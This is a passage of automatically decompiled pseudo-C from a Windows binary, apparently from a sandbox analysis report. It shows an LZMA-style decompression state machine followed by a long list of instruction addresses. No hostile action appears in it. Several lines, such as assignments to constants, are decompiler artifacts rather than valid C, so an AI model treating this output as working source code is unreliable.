                                            								_t121 = __ebp - 0x70;
                                            								 *_t121 =  *(__ebp - 0x70) + 1;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            								goto L38;
                                            							}
                                            						}
                                            					}
                                            					L1:
                                            					_t534 =  *(_t614 - 0x88);
                                            					if(_t534 > 0x1c) {
                                            						L171:
                                            						_t535 = _t534 | 0xffffffff;
                                            						goto L172;
                                            					}
                                            					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                            						case 0:
                                            							if( *(_t614 - 0x6c) == 0) {
                                            								goto L170;
                                            							}
                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                            							_t534 =  *( *(_t614 - 0x70));
                                            							if(_t534 > 0xe1) {
                                            								goto L171;
                                            							}
                                            							_t538 = _t534 & 0x000000ff;
                                            							_push(0x2d);
                                            							asm("cdq");
                                            							_pop(_t570);
                                            							_push(9);
                                            							_pop(_t571);
                                            							_t610 = _t538 / _t570;
                                            							_t540 = _t538 % _t570 & 0x000000ff;
                                            							asm("cdq");
                                            							_t605 = _t540 % _t571 & 0x000000ff;
                                            							 *(_t614 - 0x3c) = _t605;
                                            							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                            							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                            							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                            							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                            								L10:
                                            								if(_t613 == 0) {
                                            									L12:
                                            									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                            									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                            									goto L15;
                                            								} else {
                                            									goto L11;
                                            								}
                                            								do {
                                            									L11:
                                            									_t613 = _t613 - 1;
                                            									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                            								} while (_t613 != 0);
                                            								goto L12;
                                            							}
                                            							if( *(_t614 - 4) != 0) {
                                            								GlobalFree( *(_t614 - 4));
                                            							}
                                            							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                            							 *(_t614 - 4) = _t534;
                                            							if(_t534 == 0) {
                                            								goto L171;
                                            							} else {
                                            								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                            								goto L10;
                                            							}
                                            						case 1:
                                            							L13:
                                            							__eflags =  *(_t614 - 0x6c);
                                            							if( *(_t614 - 0x6c) == 0) {
                                            								 *(_t614 - 0x88) = 1;
                                            								goto L170;
                                            							}
                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                            							_t45 = _t614 - 0x48;
                                            							 *_t45 =  *(_t614 - 0x48) + 1;
                                            							__eflags =  *_t45;
                                            							L15:
                                            							if( *(_t614 - 0x48) < 4) {
                                            								goto L13;
                                            							}
                                            							_t546 =  *(_t614 - 0x40);
                                            							if(_t546 ==  *(_t614 - 0x74)) {
                                            								L20:
                                            								 *(_t614 - 0x48) = 5;
                                            								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                            								goto L23;
                                            							}
                                            							 *(_t614 - 0x74) = _t546;
                                            							if( *(_t614 - 8) != 0) {
                                            								GlobalFree( *(_t614 - 8));
                                            							}
                                            							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                            							 *(_t614 - 8) = _t534;
                                            							if(_t534 == 0) {
                                            								goto L171;
                                            							} else {
                                            								goto L20;
                                            							}
                                            						case 2:
                                            							L24:
                                            							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                            							 *(_t614 - 0x84) = 6;
                                            							 *(_t614 - 0x4c) = _t553;
                                            							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                            							goto L132;
                                            						case 3:
                                            							L21:
                                            							__eflags =  *(_t614 - 0x6c);
                                            							if( *(_t614 - 0x6c) == 0) {
                                            								 *(_t614 - 0x88) = 3;
                                            								goto L170;
                                            							}
                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                            							_t67 = _t614 - 0x70;
                                            							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                            							__eflags =  *_t67;
                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                            							L23:
                                            							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                            							if( *(_t614 - 0x48) != 0) {
                                            								goto L21;
                                            							}
                                            							goto L24;
                                            						case 4:
                                            							goto L133;
                                            						case 5:
                                            							goto L137;
                                            						case 6:
                                            							goto L0;
                                            						case 7:
                                            							__eflags =  *(__ebp - 0x40) - 1;
                                            							if( *(__ebp - 0x40) != 1) {
                                            								__eax =  *(__ebp - 0x24);
                                            								 *(__ebp - 0x80) = 0x16;
                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            								__eax =  *(__ebp - 0x28);
                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            								__eax =  *(__ebp - 0x2c);
                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            								__eax = 0;
                                            								__eflags =  *(__ebp - 0x38) - 7;
                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            								__al = __al & 0x000000fd;
                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            								__eax =  *(__ebp - 4);
                                            								__eax =  *(__ebp - 4) + 0x664;
                                            								__eflags = __eax;
                                            								 *(__ebp - 0x58) = __eax;
                                            								goto L68;
                                            							}
                                            							__eax =  *(__ebp - 4);
                                            							__ecx =  *(__ebp - 0x38);
                                            							 *(__ebp - 0x84) = 8;
                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            							goto L132;
                                            						case 8:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x84) = 0xa;
                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            							} else {
                                            								__eax =  *(__ebp - 0x38);
                                            								__ecx =  *(__ebp - 4);
                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                            								 *(__ebp - 0x84) = 9;
                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            							}
                                            							goto L132;
                                            						case 9:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								goto L89;
                                            							}
                                            							__eflags =  *(__ebp - 0x60);
                                            							if( *(__ebp - 0x60) == 0) {
                                            								goto L171;
                                            							}
                                            							__eax = 0;
                                            							__eflags =  *(__ebp - 0x38) - 7;
                                            							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                            							__eflags = _t258;
                                            							0 | _t258 = _t258 + _t258 + 9;
                                            							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                            							goto L75;
                                            						case 0xa:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 4);
                                            								__ecx =  *(__ebp - 0x38);
                                            								 *(__ebp - 0x84) = 0xb;
                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x28);
                                            							goto L88;
                                            						case 0xb:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__ecx =  *(__ebp - 0x24);
                                            								__eax =  *(__ebp - 0x20);
                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            							} else {
                                            								__eax =  *(__ebp - 0x24);
                                            							}
                                            							__ecx =  *(__ebp - 0x28);
                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            							L88:
                                            							__ecx =  *(__ebp - 0x2c);
                                            							 *(__ebp - 0x2c) = __eax;
                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            							L89:
                                            							__eax =  *(__ebp - 4);
                                            							 *(__ebp - 0x80) = 0x15;
                                            							__eax =  *(__ebp - 4) + 0xa68;
                                            							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            							goto L68;
                                            						case 0xc:
                                            							L99:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0xc;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t334 = __ebp - 0x70;
                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t334;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							__eax =  *(__ebp - 0x2c);
                                            							goto L101;
                                            						case 0xd:
                                            							goto L36;
                                            						case 0xe:
                                            							goto L45;
                                            						case 0xf:
                                            							goto L57;
                                            						case 0x10:
                                            							L109:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0x10;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t365 = __ebp - 0x70;
                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t365;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							goto L111;
                                            						case 0x11:
                                            							L68:
                                            							__esi =  *(__ebp - 0x58);
                                            							 *(__ebp - 0x84) = 0x12;
                                            							goto L132;
                                            						case 0x12:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								__eax =  *(__ebp - 0x58);
                                            								 *(__ebp - 0x84) = 0x13;
                                            								__esi =  *(__ebp - 0x58) + 2;
                                            								goto L132;
                                            							}
                                            							__eax =  *(__ebp - 0x4c);
                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax =  *(__ebp - 0x4c) << 4;
                                            							__eflags = __eax;
                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                            							goto L130;
                                            						case 0x13:
                                            							__eflags =  *(__ebp - 0x40);
                                            							if( *(__ebp - 0x40) != 0) {
                                            								_t469 = __ebp - 0x58;
                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            								__eflags =  *_t469;
                                            								 *(__ebp - 0x30) = 0x10;
                                            								 *(__ebp - 0x40) = 8;
                                            								L144:
                                            								 *(__ebp - 0x7c) = 0x14;
                                            								goto L145;
                                            							}
                                            							__eax =  *(__ebp - 0x4c);
                                            							__ecx =  *(__ebp - 0x58);
                                            							__eax =  *(__ebp - 0x4c) << 4;
                                            							 *(__ebp - 0x30) = 8;
                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            							L130:
                                            							 *(__ebp - 0x58) = __eax;
                                            							 *(__ebp - 0x40) = 3;
                                            							goto L144;
                                            						case 0x14:
                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            							__eax =  *(__ebp - 0x80);
                                            							goto L140;
                                            						case 0x15:
                                            							__eax = 0;
                                            							__eflags =  *(__ebp - 0x38) - 7;
                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            							__al = __al & 0x000000fd;
                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            							goto L120;
                                            						case 0x16:
                                            							__eax =  *(__ebp - 0x30);
                                            							__eflags = __eax - 4;
                                            							if(__eax >= 4) {
                                            								_push(3);
                                            								_pop(__eax);
                                            							}
                                            							__ecx =  *(__ebp - 4);
                                            							 *(__ebp - 0x40) = 6;
                                            							__eax = __eax << 7;
                                            							 *(__ebp - 0x7c) = 0x19;
                                            							 *(__ebp - 0x58) = __eax;
                                            							goto L145;
                                            						case 0x17:
                                            							L145:
                                            							__eax =  *(__ebp - 0x40);
                                            							 *(__ebp - 0x50) = 1;
                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            							goto L149;
                                            						case 0x18:
                                            							L146:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0x18;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t484 = __ebp - 0x70;
                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t484;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							L148:
                                            							_t487 = __ebp - 0x48;
                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                            							__eflags =  *_t487;
                                            							L149:
                                            							__eflags =  *(__ebp - 0x48);
                                            							if( *(__ebp - 0x48) <= 0) {
                                            								__ecx =  *(__ebp - 0x40);
                                            								__ebx =  *(__ebp - 0x50);
                                            								0 = 1;
                                            								__eax = 1 << __cl;
                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            								__eax =  *(__ebp - 0x7c);
                                            								 *(__ebp - 0x44) = __ebx;
                                            								goto L140;
                                            							}
                                            							__eax =  *(__ebp - 0x50);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            							__eax =  *(__ebp - 0x58);
                                            							__esi = __edx + __eax;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__ax =  *__esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								__cx = __ax >> 5;
                                            								__eax = __eax - __ecx;
                                            								__edx = __edx + 1;
                                            								__eflags = __edx;
                                            								 *__esi = __ax;
                                            								 *(__ebp - 0x50) = __edx;
                                            							} else {
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								goto L148;
                                            							} else {
                                            								goto L146;
                                            							}
                                            						case 0x19:
                                            							__eflags = __ebx - 4;
                                            							if(__ebx < 4) {
                                            								 *(__ebp - 0x2c) = __ebx;
                                            								L119:
                                            								_t393 = __ebp - 0x2c;
                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                            								__eflags =  *_t393;
                                            								L120:
                                            								__eax =  *(__ebp - 0x2c);
                                            								__eflags = __eax;
                                            								if(__eax == 0) {
                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            									goto L170;
                                            								}
                                            								__eflags = __eax -  *(__ebp - 0x60);
                                            								if(__eax >  *(__ebp - 0x60)) {
                                            									goto L171;
                                            								}
                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            								__eax =  *(__ebp - 0x30);
                                            								_t400 = __ebp - 0x60;
                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            								__eflags =  *_t400;
                                            								goto L123;
                                            							}
                                            							__ecx = __ebx;
                                            							__eax = __ebx;
                                            							__ecx = __ebx >> 1;
                                            							__eax = __ebx & 0x00000001;
                                            							__ecx = (__ebx >> 1) - 1;
                                            							__al = __al | 0x00000002;
                                            							__eax = (__ebx & 0x00000001) << __cl;
                                            							__eflags = __ebx - 0xe;
                                            							 *(__ebp - 0x2c) = __eax;
                                            							if(__ebx >= 0xe) {
                                            								__ebx = 0;
                                            								 *(__ebp - 0x48) = __ecx;
                                            								L102:
                                            								__eflags =  *(__ebp - 0x48);
                                            								if( *(__ebp - 0x48) <= 0) {
                                            									__eax = __eax + __ebx;
                                            									 *(__ebp - 0x40) = 4;
                                            									 *(__ebp - 0x2c) = __eax;
                                            									__eax =  *(__ebp - 4);
                                            									__eax =  *(__ebp - 4) + 0x644;
                                            									__eflags = __eax;
                                            									L108:
                                            									__ebx = 0;
                                            									 *(__ebp - 0x58) = __eax;
                                            									 *(__ebp - 0x50) = 1;
                                            									 *(__ebp - 0x44) = 0;
                                            									 *(__ebp - 0x48) = 0;
                                            									L112:
                                            									__eax =  *(__ebp - 0x40);
                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            										_t391 = __ebp - 0x2c;
                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            										__eflags =  *_t391;
                                            										goto L119;
                                            									}
                                            									__eax =  *(__ebp - 0x50);
                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            									__eax =  *(__ebp - 0x58);
                                            									__esi = __edi + __eax;
                                            									 *(__ebp - 0x54) = __esi;
                                            									__ax =  *__esi;
                                            									__ecx = __ax & 0x0000ffff;
                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                            									if( *(__ebp - 0xc) >= __edx) {
                                            										__ecx = 0;
                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            										__ecx = 1;
                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            										__ebx = 1;
                                            										__ecx =  *(__ebp - 0x48);
                                            										__ebx = 1 << __cl;
                                            										__ecx = 1 << __cl;
                                            										__ebx =  *(__ebp - 0x44);
                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                            										__cx = __ax;
                                            										__cx = __ax >> 5;
                                            										__eax = __eax - __ecx;
                                            										__edi = __edi + 1;
                                            										__eflags = __edi;
                                            										 *(__ebp - 0x44) = __ebx;
                                            										 *__esi = __ax;
                                            										 *(__ebp - 0x50) = __edi;
                                            									} else {
                                            										 *(__ebp - 0x10) = __edx;
                                            										0x800 = 0x800 - __ecx;
                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            										 *__esi = __dx;
                                            									}
                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                            										L111:
                                            										_t368 = __ebp - 0x48;
                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                            										__eflags =  *_t368;
                                            										goto L112;
                                            									} else {
                                            										goto L109;
                                            									}
                                            								}
                                            								__ecx =  *(__ebp - 0xc);
                                            								__ebx = __ebx + __ebx;
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            								 *(__ebp - 0x44) = __ebx;
                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            									__ecx =  *(__ebp - 0x10);
                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            									__ebx = __ebx | 0x00000001;
                                            									__eflags = __ebx;
                                            									 *(__ebp - 0x44) = __ebx;
                                            								}
                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                            									L101:
                                            									_t338 = __ebp - 0x48;
                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                            									__eflags =  *_t338;
                                            									goto L102;
                                            								} else {
                                            									goto L99;
                                            								}
                                            							}
                                            							__edx =  *(__ebp - 4);
                                            							__eax = __eax - __ebx;
                                            							 *(__ebp - 0x40) = __ecx;
                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            							goto L108;
                                            						case 0x1a:
                                            							goto L55;
                                            						case 0x1b:
                                            							L75:
                                            							__eflags =  *(__ebp - 0x64);
                                            							if( *(__ebp - 0x64) == 0) {
                                            								 *(__ebp - 0x88) = 0x1b;
                                            								goto L170;
                                            							}
                                            							__eax =  *(__ebp - 0x14);
                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            							__eflags = __eax -  *(__ebp - 0x74);
                                            							if(__eax >=  *(__ebp - 0x74)) {
                                            								__eax = __eax +  *(__ebp - 0x74);
                                            								__eflags = __eax;
                                            							}
                                            							__edx =  *(__ebp - 8);
                                            							__cl =  *(__eax + __edx);
                                            							__eax =  *(__ebp - 0x14);
                                            							 *(__ebp - 0x5c) = __cl;
                                            							 *(__eax + __edx) = __cl;
                                            							__eax = __eax + 1;
                                            							__edx = 0;
                                            							_t274 = __eax %  *(__ebp - 0x74);
                                            							__eax = __eax /  *(__ebp - 0x74);
                                            							__edx = _t274;
                                            							__eax =  *(__ebp - 0x68);
                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            							_t283 = __ebp - 0x64;
                                            							 *_t283 =  *(__ebp - 0x64) - 1;
                                            							__eflags =  *_t283;
                                            							 *( *(__ebp - 0x68)) = __cl;
                                            							goto L79;
                                            						case 0x1c:
                                            							while(1) {
                                            								L123:
                                            								__eflags =  *(__ebp - 0x64);
                                            								if( *(__ebp - 0x64) == 0) {
                                            									break;
                                            								}
                                            								__eax =  *(__ebp - 0x14);
                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            								__eflags = __eax -  *(__ebp - 0x74);
                                            								if(__eax >=  *(__ebp - 0x74)) {
                                            									__eax = __eax +  *(__ebp - 0x74);
                                            									__eflags = __eax;
                                            								}
                                            								__edx =  *(__ebp - 8);
                                            								__cl =  *(__eax + __edx);
                                            								__eax =  *(__ebp - 0x14);
                                            								 *(__ebp - 0x5c) = __cl;
                                            								 *(__eax + __edx) = __cl;
                                            								__eax = __eax + 1;
                                            								__edx = 0;
                                            								_t414 = __eax %  *(__ebp - 0x74);
                                            								__eax = __eax /  *(__ebp - 0x74);
                                            								__edx = _t414;
                                            								__eax =  *(__ebp - 0x68);
                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            								__eflags =  *(__ebp - 0x30);
                                            								 *( *(__ebp - 0x68)) = __cl;
                                            								 *(__ebp - 0x14) = __edx;
                                            								if( *(__ebp - 0x30) > 0) {
                                            									continue;
                                            								} else {
                                            									goto L80;
                                            								}
                                            							}
                                            							 *(__ebp - 0x88) = 0x1c;
                                            							goto L170;
                                            					}
                                            				}
                                            			}













                                            0x00000000
                                            0x00406d5f
                                            0x00406d5f
                                            0x00406d64
                                            0x00406ddb
                                            0x00406de2
                                            0x00406dec
                                            0x004073cb
                                            0x004073cb
                                            0x004073ce
                                            0x004073ce
                                            0x004073d4
                                            0x004073da
                                            0x004073e0
                                            0x004073fa
                                            0x004073fd
                                            0x00407403
                                            0x0040740e
                                            0x00407410
                                            0x004073e2
                                            0x004073e2
                                            0x004073f1
                                            0x004073f5
                                            0x004073f5
                                            0x0040741a
                                            0x00407441
                                            0x00407441
                                            0x00407447
                                            0x00407447
                                            0x00000000
                                            0x0040741c
                                            0x0040741c
                                            0x00407420
                                            0x004075cf
                                            0x00000000
                                            0x004075cf
                                            0x0040742c
                                            0x00407433
                                            0x0040743b
                                            0x0040743e
                                            0x00000000
                                            0x0040743e
                                            0x00406d66
                                            0x00406d66
                                            0x00406d6a
                                            0x00406d72
                                            0x00406d75
                                            0x00406d77
                                            0x00406d7a
                                            0x00406d7c
                                            0x00406d81
                                            0x00406d84
                                            0x00406d8b
                                            0x00406d92
                                            0x00406d95
                                            0x00406da0
                                            0x00406da8
                                            0x00406da8
                                            0x00406da2
                                            0x00406da2
                                            0x00406da2
                                            0x00406d97
                                            0x00406d97
                                            0x00406d97
                                            0x00406daf
                                            0x00406dcd
                                            0x00406dcf
                                            0x00406fa2
                                            0x00406fa2
                                            0x00406fa5
                                            0x00406fa8
                                            0x00406fab
                                            0x00406fae
                                            0x00406fb1
                                            0x00406fb4
                                            0x00406fb7
                                            0x00406fba
                                            0x00406fc0
                                            0x00406fd8
                                            0x00406fdb
                                            0x00406fde
                                            0x00406fe1
                                            0x00406fe1
                                            0x00406fe4
                                            0x00406fea
                                            0x00406fc2
                                            0x00406fc2
                                            0x00406fca
                                            0x00406fcf
                                            0x00406fd1
                                            0x00406fd3
                                            0x00406fd3
                                            0x00406ff4
                                            0x00406ff7
                                            0x00406f9a
                                            0x00406fa0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406ff9
                                            0x00406f75
                                            0x00406f79
                                            0x00407581
                                            0x00000000
                                            0x00407581
                                            0x00406f7f
                                            0x00406f82
                                            0x00406f85
                                            0x00406f89
                                            0x00406f8c
                                            0x00406f92
                                            0x00406f94
                                            0x00406f94
                                            0x00406f97
                                            0x00000000
                                            0x00406f97
                                            0x00406db1
                                            0x00406db1
                                            0x00406db4
                                            0x00406dba
                                            0x00406dbc
                                            0x00406dbc
                                            0x00406dbf
                                            0x00406dc2
                                            0x00406dc4
                                            0x00406dc5
                                            0x00406dc8
                                            0x00406e35
                                            0x00406e35
                                            0x00406e39
                                            0x00406e3c
                                            0x00406e3f
                                            0x00406e42
                                            0x00406e45
                                            0x00406e46
                                            0x00406e49
                                            0x00406e4b
                                            0x00406e51
                                            0x00406e54
                                            0x00406e57
                                            0x00406e5a
                                            0x00406e5d
                                            0x00406e63
                                            0x00406e7f
                                            0x00406e82
                                            0x00406e85
                                            0x00406e88
                                            0x00406e8f
                                            0x00406e95
                                            0x00406e99
                                            0x00406e65
                                            0x00406e65
                                            0x00406e69
                                            0x00406e71
                                            0x00406e76
                                            0x00406e78
                                            0x00406e7a
                                            0x00406e7a
                                            0x00406ea3
                                            0x00406ea6
                                            0x00406e1d
                                            0x00406e1d
                                            0x00406e23
                                            0x00406ed6
                                            0x00406edc
                                            0x00000000
                                            0x00000000
                                            0x00406ede
                                            0x00406ee1
                                            0x00406ee4
                                            0x00406ee7
                                            0x00406eea
                                            0x00406eed
                                            0x00406ef0
                                            0x00406ef3
                                            0x00406ef6
                                            0x00406efc
                                            0x00406f14
                                            0x00406f17
                                            0x00406f1a
                                            0x00406f1d
                                            0x00406f1d
                                            0x00406f20
                                            0x00406f26
                                            0x00406efe
                                            0x00406efe
                                            0x00406f06
                                            0x00406f0b
                                            0x00406f0d
                                            0x00406f0f
                                            0x00406f0f
                                            0x00406f30
                                            0x00406f33
                                            0x00406eb1
                                            0x00406eb5
                                            0x00407575
                                            0x00000000
                                            0x00407575
                                            0x00406ebb
                                            0x00406ebe
                                            0x00406ec1
                                            0x00406ec5
                                            0x00406ec8
                                            0x00406ece
                                            0x00406ed0
                                            0x00406ed0
                                            0x00406ed3
                                            0x00406ed3
                                            0x00406f33
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3a
                                            0x00406f3e
                                            0x00406f3e
                                            0x00406f41
                                            0x00406f44
                                            0x00406f48
                                            0x0040758d
                                            0x00000000
                                            0x0040758d
                                            0x00406f4e
                                            0x00406f51
                                            0x00406f54
                                            0x00406f57
                                            0x00406f5a
                                            0x00406f5d
